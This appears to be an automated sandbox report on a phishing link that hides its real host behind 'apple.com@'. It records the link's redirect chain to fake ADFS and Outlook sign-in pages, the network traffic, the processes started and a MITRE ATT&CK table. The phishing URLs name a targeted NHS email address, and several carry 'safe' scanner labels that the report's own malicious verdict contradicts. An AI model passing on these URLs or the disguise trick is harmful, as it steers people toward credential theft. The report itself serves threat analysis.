Source: global traffic	HTTP traffic detected: GET /adfs/portal/illustration/illustration.png?id=7990E15053EC74EC6F6A7BAE796B821EE5A4BC17834D60F8E5591C33871A0F50 HTTP/1.1Host: giannio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AU4AMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAABOAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEC9dXChY0b6LXDZ8fAIKs3mEgouST5ceJt6ZNLZTF4EV9b_bBGMoMMCQkZZ3wiabCp6uw6GJlWycqfxqr8tZvp9FNNWNewVXbZaC13OngHakgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQECjnbUgKvoOMMEISkGrYRmxdtGdgyj_e6-qkoqKxHy4FVPFW_iMkoevHDDcgYSjld31gzVmbr5n-MbB24NVP6dtkLHycUwjpk_7Glra9ieMe6ZDP-OuyU79xaj8qVSrFUJpz69x1Hyhm1uaqgSRooC3f2AHbsCKFtOEF1qPcy19Wgs_hnhI-R1MWBdAbEkzwe-sii5zyt3HprDDxjlv5V9Oci2GQ15mqult0Y0BzMLZ-9mtgk4H0xfIO9Z2aZjVCEgUZH6tTqWmhvGE6RT6Wix10XnCL2eiQMEWO1azucPnwoOWqTnLXVhUL8PyvwNSdIyAnMY0rNDJ9XEr4sm3nCeARQfXJo3VysnFC-lMU2gGnyWRc2zlPTIU1wFh7ivLz6db1d48OtQiKF9KF9kVV_M_p8Ht3nE9SLCe6KU00_Cd7hEmA4fgO4UxT9GSfH71y6ZotAXpAyzgV5Khzglfoo3AJkeYJfoW3YkoJNaGBFKb9d0R1VB_G0BcIL-3tcI-_XIAA; fpc=Aigy6MsT76xAmzN3plwdK4eerOTJAQAAAGGEGN8OAAAA; cltm=CgAQABoAIgQIDBAF; CIS2Available=true; ApplicationGatewayAffinityCORS=252a3672155692f4718f4bed6ec6518d; ApplicationGatewayAffinity=252a3672155692f4718f4bed6ec6518d

Source: global traffic	DNS traffic detected: DNS query: jtkink.com
Source: global traffic	DNS traffic detected: DNS query: 5eedab40.shaullerica.workers.dev
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: bas-co.uk
Source: global traffic	DNS traffic detected: DNS query: giannio.com

Source: unknown

HTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3247sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74Xsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 8d1d5d15-cb6c-4e17-88bb-fb491d7aad00x-ms-ests-server: 2.1.19870.3 - NEULR1 ProdSlicesnel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-QaE5ydF5vQiyovEbdT0Rsw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-AllDate: Tue, 14 Jan 2025 16:14:25 GMTConnection: closeContent-Length: 0Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Source: chromecache_69.1.dr, chromecache_80.1.dr	String found in binary or memory: https://bas-co.uk/?ekpjrgyb
Source: chromecache_73.1.dr	String found in binary or memory: https://bas-co.uk/?ekpjrgyb&qrc=adrianmarsh
Source: chromecache_68.1.dr, chromecache_69.1.dr, chromecache_73.1.dr, chromecache_80.1.dr	String found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
Source: chromecache_72.1.dr	String found in binary or memory: https://giannio.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2dpYW5uaW8uY2

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: classification engine

Classification label: mal60.phis.win@20/39@24/11

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1980,i,8374971068265058309,17519462833624527332,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1980,i,8374971068265058309,17519462833624527332,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://giannio.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2dpYW5uaW8uY2	0%	Avira URL Cloud	safe
https://giannio.com/favicon.ico	0%	Avira URL Cloud	safe
https://bas-co.uk/?ekpjrgyb&qrc=adrianmarsh@nhs.net	0%	Avira URL Cloud	safe
https://5eedab40.shaullerica.workers.dev/favicon.ico	0%	Avira URL Cloud	safe
https://giannio.com/?qrc=adrianmarsh%40nhs.net	0%	Avira URL Cloud	safe
https://bas-co.uk/?ekpjrgyb	0%	Avira URL Cloud	safe
https://giannio.com/owa/?login_hint=adrianmarsh%40nhs.net	0%	Avira URL Cloud	safe
https://bas-co.uk/?ekpjrgyb&qrc=adrianmarsh	0%	Avira URL Cloud	safe
https://giannio.com/adfs/portal/images/idp/idp.png?id=2AC2FFC878EA9FD5C7CA28D4A2C50FFC42C0562DBB8C70436EF326F4434ABA1E	0%	Avira URL Cloud	safe
https://giannio.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2dpYW5uaW8uY29tLyIsImRvbWFpbiI6ImdpYW5uaW8uY29tIiwia2V5IjoiaEZOMTFNS0dDSFpzIiwicXJjIjoiYWRyaWFubWFyc2hAbmhzLm5ldCIsImlhdCI6MTczNjg3MTI2MCwiZXhwIjoxNzM2ODcxMzgwfQ.paqwP-ugkt_U78GOlPQHscluhYutvgpoUiV-DeuQCD8	0%	Avira URL Cloud	safe
https://giannio.com/adfs/portal/illustration/illustration.png?id=7990E15053EC74EC6F6A7BAE796B821EE5A4BC17834D60F8E5591C33871A0F50	0%	Avira URL Cloud	safe
https://giannio.com/adfs/portal/css/style.css?id=33CE921C6722E586DEA10D344605F1331BBD100230AFE2CC69B7CFBD04556093	0%	Avira URL Cloud	safe
https://giannio.com/adfs/portal/logo/logo.jpg?id=552AE255AE9C812ECF6AF2F3C0FDBD42503C77296588855C70A319F71FF4446F	0%	Avira URL Cloud	safe
https://jtkink.com/favicon.ico	0%	Avira URL Cloud	safe
https://bas-co.uk/?ekpjrgyb=c25456288a8a7517ca93e4a8f97f07e8ffdea4eee4fb00b0f1c081248990b79182ec9add4905e2a5a774c409eb37322dc2e2a3426df6098843e2cef1e62f150d&qrc=adrianmarsh%40nhs.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
5eedab40.shaullerica.workers.dev	172.67.186.98	true	false	high
challenges.cloudflare.com	104.18.95.41	true	false	high
giannio.com	178.215.224.171	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	142.250.185.100	true	false	high
jtkink.com	163.47.74.193	true	false	high
bas-co.uk	178.215.224.171	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://giannio.com/owa/?login_hint=adrianmarsh%40nhs.net	false	Avira URL Cloud: safe	unknown
https://bas-co.uk/?ekpjrgyb&qrc=adrianmarsh@nhs.net	false	Avira URL Cloud: safe	unknown
https://5eedab40.shaullerica.workers.dev/favicon.ico	true	Avira URL Cloud: safe	unknown
https://giannio.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/901eeac43f625e71/1736871247206/f37lvsh0JO71dIb	false		high
https://giannio.com/adfs/portal/images/idp/idp.png?id=2AC2FFC878EA9FD5C7CA28D4A2C50FFC42C0562DBB8C70436EF326F4434ABA1E	false	Avira URL Cloud: safe	unknown
https://jtkink.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://5eedab40.shaullerica.workers.dev/?email=adrianmarsh@nhs.net	false		unknown
https://giannio.com/?qrc=adrianmarsh%40nhs.net	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/	false		high
https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901eeac43f625e71&lang=auto	false		high
https://bas-co.uk/?ekpjrgyb=c25456288a8a7517ca93e4a8f97f07e8ffdea4eee4fb00b0f1c081248990b79182ec9add4905e2a5a774c409eb37322dc2e2a3426df6098843e2cef1e62f150d&qrc=adrianmarsh%40nhs.net	false	Avira URL Cloud: safe	unknown
https://giannio.com/adfs/portal/illustration/illustration.png?id=7990E15053EC74EC6F6A7BAE796B821EE5A4BC17834D60F8E5591C33871A0F50	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback	false		high
https://giannio.com/adfs/portal/css/style.css?id=33CE921C6722E586DEA10D344605F1331BBD100230AFE2CC69B7CFBD04556093	false	Avira URL Cloud: safe	unknown
https://giannio.com/adfs/portal/logo/logo.jpg?id=552AE255AE9C812ECF6AF2F3C0FDBD42503C77296588855C70A319F71FF4446F	false	Avira URL Cloud: safe	unknown
https://giannio.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2dpYW5uaW8uY29tLyIsImRvbWFpbiI6ImdpYW5uaW8uY29tIiwia2V5IjoiaEZOMTFNS0dDSFpzIiwicXJjIjoiYWRyaWFubWFyc2hAbmhzLm5ldCIsImlhdCI6MTczNjg3MTI2MCwiZXhwIjoxNzM2ODcxMzgwfQ.paqwP-ugkt_U78GOlPQHscluhYutvgpoUiV-DeuQCD8	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://giannio.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2dpYW5uaW8uY2	chromecache_72.1.dr	false	Avira URL Cloud: safe	unknown
https://bas-co.uk/?ekpjrgyb&qrc=adrianmarsh	chromecache_73.1.dr	false	Avira URL Cloud: safe	unknown
https://bas-co.uk/?ekpjrgyb	chromecache_69.1.dr, chromecache_80.1.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
163.47.74.193	jtkink.com	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	false
104.18.94.41	unknown	United States	13335	CLOUDFLARENETUS	false
104.18.95.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
142.250.185.100	www.google.com	United States	15169	GOOGLEUS	false
178.215.224.171	giannio.com	Germany	10753	LVLT-10753US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.43.221	unknown	United States	13335	CLOUDFLARENETUS	true
172.67.186.98	5eedab40.shaullerica.workers.dev	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16
192.168.2.5
192.168.2.14

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591076
Start date and time:	2025-01-14 17:13:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
